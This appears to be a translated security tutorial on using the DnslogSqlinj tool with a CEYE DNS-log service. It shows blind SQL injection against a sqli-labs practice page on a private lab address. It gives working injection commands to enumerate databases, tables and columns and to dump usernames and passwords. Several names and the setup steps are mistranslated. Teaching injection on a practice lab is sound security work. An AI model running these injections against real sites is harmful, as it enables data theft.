#Involving tools and environment construction
Tool download
https://github.com/ADOOO/DnslogSqlinj
CEYE - Monitor service for security testing (dns domain name interface)
use kail
python.2.7 environment
pip2 install vent==1.2.2
pip2 install termcolor
Note: pip installation termcolor failure solution_termcolor installation_B1aK2's blog-CSDN blog
If the termcolor installation fails, you can check the solution in the above article
Enter directly in the terminal of kail:
pip2 install vent==1.2.2
pip2 install termcolor
ready to install
#CCYE+DnslogSqlinj use
First register an account in CCYE
Click on the upper right corner to open the main interface
There are ldentifier and API Token, which we will need later
Open kail and enter the directory of DnslogSqlinj-master
Edit the config.py file
Enter the previous CCYE information into it
Lentifier corresponds to Dnsurl
apitoken corresponds to apitoken
#Automation statement structure
#Demo case
1. First open the program
Command: sudo python dnslogSql.py
2. Get all databases
play load:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs
Injection statement:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs
?id=1' and ({}) --+ --dbs
?id=1' --+ First of all, determine its closing method and use ' closure, because this tool will not help you automatically detect which injection points are there, so you need to find the injection point first and determine its closing method .
and ({}): ({}) This place is where the injection instruction is placed, the injected statement
--dbs : resolve all library names
When we hit enter, he will send the ({}) injection statement to the target website location http://192.168.222.142
Get data count: There are currently 9 databases
The above is all the databases of the target website
3. Get all the table names of the specified database (specify to view the security database)
paly load:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables
injection statement
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables
After pressing Enter, he will get all the table names of the specified data table
Show a total of 4 tables
4. Get the column name (view all field information (columns) of the specified data table "users")
play load
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns
statement:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns
At this point, all the field information of the users data table will come out.
5. Drag library (view all information of username and password)
paly load
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" -C "username,password" --dump